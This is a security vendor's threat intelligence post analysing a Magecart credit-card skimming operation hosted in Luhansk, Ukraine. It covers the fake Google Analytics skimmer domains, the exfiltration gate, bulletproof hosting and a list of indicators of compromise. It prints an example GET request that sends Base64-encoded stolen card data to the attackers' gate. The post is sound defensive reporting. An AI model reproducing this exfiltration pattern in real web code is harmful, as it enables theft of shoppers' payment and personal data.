No man’s land: How a Magecart group is running a web skimming operation from a war zone
Credit to Author: Threat Intelligence Team| Date: Thu, 18 Jul 2019 15:00:13 +0000
Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.
During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.
What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.
The setup
Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.
We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.
Skimmer analysis
The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.
Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.
Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):
In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.
Exfiltration gate
A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.
The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:
GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}
The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:
The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.
Panel and bulletproof hosting
A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.
lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider that “will always go the extra mile to protect our customers’ civil rights, including the freedom of expression, the freedom of the press, the right to anonymity and privacy.” It’s quite likely the threat actors may be taking advantage of it.
The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.
A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.
Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.
A host ripe with malware, skimmers, phishing domains
Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.
In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:
Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.
Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.
To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.
Indicators of Compromise
Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)
Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)
Skimmers (JavaScript)
2cf2d3608a3e5dc2e0629bc80b5c3f11007608a1e6a3159931bb403f2a2ae09b
687a0deb72c250a24245e68101f2bd1acc377fc90ac22140f5cca9f515fc3914
7a20d0a5d8397624623e0a27d93c8741c187249d78e8f6d9dcad45010293d300
d5cbb9011352525a607c430c338a68a0a39d172940f03bb81b3bdaba91cb0e66
757df530dffe4b303399421ea0c53eb1723ba413585ef4ede804aaffed5cc3c1
f4fad9c9018befdaa455b6c248dd7fc017ed32f69123b6a1d04b4a2e44d69b25
37aac00b65d009fb8899f129a82ee3480640f50253ee0ff934ad25b9089254f2
c399a312c842494f81438d4510f8a7e6721912eb319a57e3d1ab34937f9dc29f
209bc0b8274cac2ed00c1fab4546cb6ab11f118497c71698b0317dc12ac68afa
12ac099a2169734b395a2519bcb783696ec46c10a6cde0ee1ad3262876336cf6
aa64fa4ba75c8c30b7eb57a24cbdf5b1dbb08d728717c89018305294237ac717
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
4e14ffc2ec79cb256605f7c2682d56fceec9638cd3545175088ad15977403dcc
ac5b6f62a62f4453c4b5c577b321fdca73d0e651c209aeb5b88a0c4a7f10b139
c139e980d2f5f21020b85db716c8a0d363ae3c30f54a7d5c290b320309283b59
27ab9adb71d7b49f8dcc1e2c168af06e4f71e4c43e7245663fcee191a70f7a7e
eb3adb1e1ae14300110439e490a39ed54ca51ba820944bd27f481b57eb0ab1aa
684fe4d87aa412c46b96dfa2c650bda2a0e9ef07bcaf294683387661107a5c72
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
2c00997d6b0e9ae06d9ed2fcae6effe9348dc660b3fea1a4e5c011f1eb2b9ace
66312a50ce08e29c01e9dfeae631f839c95f2c04d8f206e12c04abdd0a5df645
af02b45c1d1198271da309b5eedde13c4e8a24934407f7a49f10707dfdd796b7
74ac75cd8f1e35da0d047ed6dd995262563b614b8dfcdfa44f689ca920b51a63
aa7372fbe02932d1182572e7cc6ba69243be3222eb212418d0b6ea638dea5fbc
341e88b473dae607b698737b6032c5a0ba3ed1a0ba08bba15757c68126a00e29
645032eaa3dd159ef027b916950c3e1ab475bedcaaac0f9c61b594d74d6833be
d74f5d6f91fbc37583e69cbc919fbe41caa84bc77713dc644bcda5b5b8581553
d8ed7abe7bdb821b93ce24e5ee0e5b867370b3fd6fc5c92f1f2d7d34fa040260
The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.